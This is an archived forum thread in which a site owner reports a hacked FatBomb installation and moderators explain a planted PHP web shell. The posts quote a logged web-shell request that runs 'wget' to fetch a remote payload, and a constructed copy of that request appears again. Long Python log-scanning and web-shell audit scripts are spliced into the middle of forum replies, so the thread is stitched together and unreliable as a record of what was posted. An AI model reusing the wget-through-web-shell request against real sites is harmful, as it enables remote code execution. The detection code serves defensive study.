The FatBomb Forum is no longer active. Use it for reference only.
For active discussions of Fatbomb, please visit:
The MadBomber Forum

Also see: FatBomb ReadMe | Newbie Install Guide

Subject: "Hosting issue"
FatBomb Topic #66

kiosk2 (team)
Member since Apr-10-06
Jan-16-08, 09:53 AM (PST)
"Hosting issue"

Hi

I was contacted by my hosting company who say the site with FatBomb on is running a permanent process.

Upon further investigation this is the problem:

 megatroll.com 69.42.213.68 - - <13/Jan/2008:08:19:06  0000> "POST /fatbomb-data/styles/status.php? HTTP/1.1" 200 21400 "http://megatroll.com/fatbomb-data/styles/status.php?act=cmd&d=/home/sites/megatroll.com/public_html/fatbomb-data/styles/temp/&cmd=wget http://cashandassets.net/source/cb.txt&cmd_txt=1&submit=Execute"; "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11"

Has the script been hacked or does this look normal?

The reference to cashandassets.net was not something I have added.

They have disabled scripting on the site until I can explain what the problem is and how it will be fixed.

Thanks

David


Kurt (admin)
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-16-08, 10:01 AM (PST)
1. "RE: Hosting issue"

Hi David,

What is this?
http://megatroll.com/fatbomb-data/styles/status.php?

This doesn't make any sense to me at all... It's not FatBomb.

One, Fatty should be installed in the cgi-bin.

Two, Fatty doesn't use a directory structure that includes /fatbomb-data.

Three, it doesn't have a "styles" directory.

Four, it's not a php script. Fatty is a cgi script. What's this status.php reference?

Your host has given no useful information, just a URL. Instead of a URL they need to provide some type of server error message.


-Boom boom boom boom.


tasari (moderator)
Member since Dec-8-02
1752 posts, 1 feedbacks, 2 points
Jan-16-08, 02:45 PM (PST)
2. "RE: Hosting issue"
(Last edited on Jan-16-08 at 02:50 PM PST)

I had that issue many times on my server (different domains => not with Tuelz or Kurt's scripts).

This is a way to overload your hosting account/server!

d=/home/sites/megatroll.com/public_html/fatbomb-data/styles/temp/&cmd=wget http://cashandassets.net/source/cb.txt

This part is the cause... it gets an external file from another host, but often this is a php file called here as a text file. Often it loops over and over and loads the server.

Some questions...
1) Did you create that "fatbomb-data" directory yourself?
1a) If yes, where did you get it? You need to alert them that there is a security issue with their script, at least with status.php.
2a) If no, then you have a hacker who got access to your hosting account and created that directory to launch that url which causes the overload. Often hackers get access from a script installed there, but you need to look at the php scripts, not Kurt's ones, which are all cgi or via Tuelz...

Let us know

Tasari


kiosk2 (team)
Member since Apr-10-06
Jan-18-08, 10:17 AM (PST)
3. "RE: Hosting issue"

Hi
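The request Tasari picks apart above, turned into a detection check. This is an added example, not code from the thread or from FatBomb: a small Python scanner that parses Apache combined-format lines with a leading virtual-host field (the layout of the line David's host sent; square brackets around the timestamp are assumed, since the forum paste shows them as < >) and flags requests whose query carries a command parameter, an act=cmd switch, or a wget/curl fetch of a remote file, looking in both the request path and the Referer. The parameter-name list, the static-directory list, and the sample log lines (documentation hosts and addresses) are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Apache "combined" log line with a leading virtual-host field, the layout of the
# line David's host sent. Brackets around the timestamp are assumed; the forum
# paste shows them as < >.
LOG_RE = re.compile(
    r'^(?P<vhost>\S+) (?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Parameter names under which a planted command-runner typically receives its
# command (assumed list; "cmd" and "act=cmd" are the ones in the logged request),
# and shell words that pull a file from another host, as the logged wget did.
CMD_PARAMS = {"cmd", "command", "exec", "c"}
FETCH_RE = re.compile(r'\b(wget|curl|fetch|lynx)\b', re.I)

# Directories that, per Kirill, hold only images and CSS; a POST to a .php
# file under them has no legitimate purpose on this site (assumed list).
STATIC_DIRS = ("/styles/", "/images/", "/css/", "/temp/")


def parse_line(line):
    """Split one log line into named fields; None if it is not in the expected layout."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def suspicious_params(url):
    """Return (name, value) pairs in the URL's query that look like command input."""
    hits = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        lname = name.lower()
        for v in values:
            if lname in CMD_PARAMS and v:
                hits.append((name, v))
            elif lname == "act" and v.lower() == "cmd":
                hits.append((name, v))
            elif FETCH_RE.search(v):
                hits.append((name, v))
    return hits


def analyse(entry):
    """Reasons an entry looks like use of a planted command runner; empty list if none."""
    reasons = []
    # The command sits in the Referer, not in the POST path: the planted page's
    # form posts back to itself, so the browser reports the previous URL (the one
    # carrying the command) as the referer.
    for field in ("path", "referer"):
        for name, value in suspicious_params(entry[field]):
            reasons.append(f"{field} carries {name}={value!r}")
    plain = entry["path"].split("?")[0].lower()
    if entry["method"] == "POST" and plain.endswith(".php") and any(d in plain for d in STATIC_DIRS):
        reasons.append("POST to a PHP file under a static-asset directory")
    return reasons


def scan(lines):
    """Return one finding per line that analyse() flags."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        reasons = analyse(entry)
        if reasons:
            findings.append({"ip": entry["ip"], "ts": entry["ts"],
                             "request": entry["path"], "reasons": reasons})
    return findings


# Constructed sample log: the first line mirrors the shape of the logged request,
# with hosts and IP replaced by documentation values; the other two are benign.
SAMPLE_LOG = [
    'shop.example.com 203.0.113.5 - - [13/Jan/2008:08:19:06 +0000] '
    '"POST /fatbomb-data/styles/status.php? HTTP/1.1" 200 21400 '
    '"http://shop.example.com/fatbomb-data/styles/status.php?act=cmd'
    '&d=/home/sites/shop.example.com/public_html/fatbomb-data/styles/temp/'
    '&cmd=wget http://remote.invalid/cb.txt&cmd_txt=1&submit=Execute" '
    '"Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) Gecko/20071127 Firefox/2.0.0.11"',
    'shop.example.com 198.51.100.7 - - [13/Jan/2008:08:20:11 +0000] '
    '"GET /fatbomb-data/styles/style.css HTTP/1.1" 200 1834 '
    '"http://shop.example.com/cgi-bin/fatbomb.cgi" "Mozilla/5.0"',
    'shop.example.com 198.51.100.7 - - [13/Jan/2008:08:20:12 +0000] '
    '"GET /cgi-bin/fatbomb.cgi?q=security+tools HTTP/1.1" 200 9120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f["ts"], f["ip"], f["request"])
        for r in f["reasons"]:
            print("   -", r)
```

Only the first sample line is reported, with three reasons: act=cmd and the wget command in the Referer, and a POST to a .php file under /styles/. A rule that inspects only the POST path would miss the first two, which is why both fields are checked.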

I've had problems replying here.

The script was installed by Kurt's support guy/programmer after I purchased it and has remained pretty much as is, as I couldn't get my head round the customization.

What do I need to do to resolve it and if it has been hacked, is the script vulnerable?

Thanks again.

David


kiosk2 (team)
Member since Apr-10-06
Jan-18-08, 10:17 AM (PST)
4. "RE: Hosting issue"

Further to my last post - yes, there were some dodgy php files that had been placed inside that folder (which has the templates in, I think).

I have deleted them (along with the templates folder - whoops, I have a backup at home though) and have asked the hosting company to re-enable scripting and to check how the site was hacked, as there were no other scripts on the site other than Kurt's which, as you say, are all cgi scripts.

Thanks for your help.

David

PS - I WILL get round to setting the site to its true potential one day!!


Kurt (admin)
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-18-08, 10:21 AM (PST)
5. "RE: Hosting issue"

Hi David,

Tasari gave good advice above.

I really can't give you any more advice since the problems seem to be associated with a php script and don't have anything to do with Fatty directly.

I wish I could be more help, but without more info there's not a lot we can do on this end.


-Boom boom boom boom.


Kurt (admin)
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-22-08, 10:29 AM (PST)
6. "RE: Hosting issue"

This is what Kirill has to say:


"The site was, indeed, hacked, but it does not seem to be related to FatBomb. The directory 'fatbomb-data/styles' was created by me during installation; it holds images and CSS files that are used by the default FatBomb templates.

The PHP file has nothing to do with FatBomb though; it's a typical hacker trick. When a hacker gets the ability to upload files to the server, he usually uploads a script that allows him to run arbitrary commands remotely. This script usually has some "typical" name, like "status.php" in this case, and is uploaded to some place deep in the filesystem tree. In this case, the attacker uploaded the script to "fatbomb-data/styles" in the hope that nobody would notice it for a long time. I bet if the site owner reviews the other directories of the site, he will find many other similar scripts with innocent names allowing remote command execution.

With regard to the script that was used to compromise the site initially, I highly doubt it was FatBomb. 99% that it was an insecure WordPress, phpBB2, or some other popular PHP program."


-Boom boom boom boom.


kiosk2 (team)
Member since Apr-10-06
Jan-22-08, 02:46 PM (PST)
7. "RE: Hosting issue"

Thanks
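Kirill's advice to review the other directories for similar innocently named scripts, as an added audit helper. This is example code, not part of the thread or of FatBomb: it walks a site tree and reports script files outside cgi-bin (the only place FatBomb's CGI lives, per Kurt's first reply; the allow-list is an assumption for this layout) together with files in which a request variable appears alongside a command or eval call. The sample tree it builds is constructed, and the stand-in for the planted status.php is a PHP comment that only carries the markers the audit looks for, so it does nothing if served.

```python
import os
import re
import tempfile

# Assumed allow-list for this layout: only cgi-bin holds executable code (Kurt:
# "Fatty should be installed in the cgi-bin"); fatbomb-data/styles holds images
# and CSS (Kirill), so a script file there is out of place by definition.
CODE_DIRS = ("cgi-bin",)
SCRIPT_EXT = {".php", ".php3", ".php5", ".phtml", ".pl", ".cgi"}

# PHP functions that hand a string to a shell or to the interpreter; paired with
# a request superglobal this is the shape of a remote command runner.
SHELL_CALL_RE = re.compile(
    r'\b(system|passthru|shell_exec|exec|popen|proc_open|eval|assert)\s*\(', re.I)
REQUEST_VARS = ("$_GET", "$_POST", "$_REQUEST", "$_COOKIE")


def audit(root):
    """Return sorted (relative path, reasons) pairs for files worth a closer look."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        in_code_dir = rel_dir.split(os.sep)[0] in CODE_DIRS
        for fname in files:
            path = os.path.join(dirpath, fname)
            reasons = []
            if os.path.splitext(fname)[1].lower() in SCRIPT_EXT and not in_code_dir:
                reasons.append("script file outside cgi-bin")
            try:
                with open(path, "rb") as fh:
                    head = fh.read(65536).decode("latin-1")
            except OSError:
                continue
            if SHELL_CALL_RE.search(head) and any(v in head for v in REQUEST_VARS):
                reasons.append("request input next to a command/eval call")
            if reasons:
                rel = os.path.relpath(path, root).replace(os.sep, "/")
                findings.append((rel, reasons))
    return sorted(findings)


def build_sample_site():
    """Constructed site tree in a temp dir, mirroring the layout named in the thread."""
    root = tempfile.mkdtemp(prefix="site-audit-")
    os.makedirs(os.path.join(root, "cgi-bin"))
    os.makedirs(os.path.join(root, "fatbomb-data", "styles", "temp"))
    files = {
        "cgi-bin/fatbomb.cgi": "#!/usr/bin/perl\nprint \"Content-type: text/html\\n\\n\";\n",
        "fatbomb-data/styles/style.css": "body { color: #000; }\n",
        "fatbomb-data/styles/logo.gif": "GIF89a",
        # Stand-in for the planted status.php: a PHP comment that only carries the
        # markers the audit looks for, so the sample file does nothing if served.
        "fatbomb-data/styles/status.php":
            "<?php\n/* constructed stand-in: passthru( $_REQUEST ) would go here */\n",
    }
    for rel, body in files.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, reasons in audit(site):
        print(rel, "->", "; ".join(reasons))
```

On the sample tree only fatbomb-data/styles/status.php is reported, for both reasons; fatbomb.cgi is a script but lives where scripts belong, and the CSS and image files carry neither marker. On a real account the same walk over public_html, followed by a look at each reported file's modification time, is the review Kirill suggests.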

Fatbomb was/is the only script installed on the site.

It is on a shared hosting server so it could have come via another site on there?

At least we identified the offending stuff and it's working ok now. Just need to upload the styles folder again. Now where did I put it?

Thanks again for your help.

David


Kurt (admin)
Member since Dec-5-02
8831 posts, 5 feedbacks, 8 points
Jan-22-08, 02:49 PM (PST)
8. "RE: Hosting issue"

Hi David,

At this point you need to ask your host about how the site was compromised, it is really their job to keep your site safe.

While it's possible Fatty was compromised, it's very unlikely for two reasons: Fatty is pretty secure and it isn't that popular. There just aren't very many people that have access to Fatty.


-Boom boom boom boom.

